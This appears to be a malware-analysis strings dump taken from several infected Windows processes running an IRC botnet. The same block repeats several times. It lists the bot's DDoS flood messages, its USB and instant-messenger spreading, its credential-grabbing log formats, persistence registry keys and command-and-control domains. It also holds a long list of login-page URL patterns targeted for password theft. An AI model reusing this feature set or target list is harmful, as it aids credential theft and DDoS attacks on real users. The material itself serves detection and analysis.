%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

%WinDir%\System32\svchost.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

svchost.exe_1152_rwx_00870000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

%System%\svchost.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

svchost.exe_1216_rwx_00CB0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

%System%\svchost.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

spoolsv.exe_1440_rwx_012E0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0/

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

%System%\spoolsv.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\spoolsv.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

wmiprvse.exe_1564_rwx_00DE0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

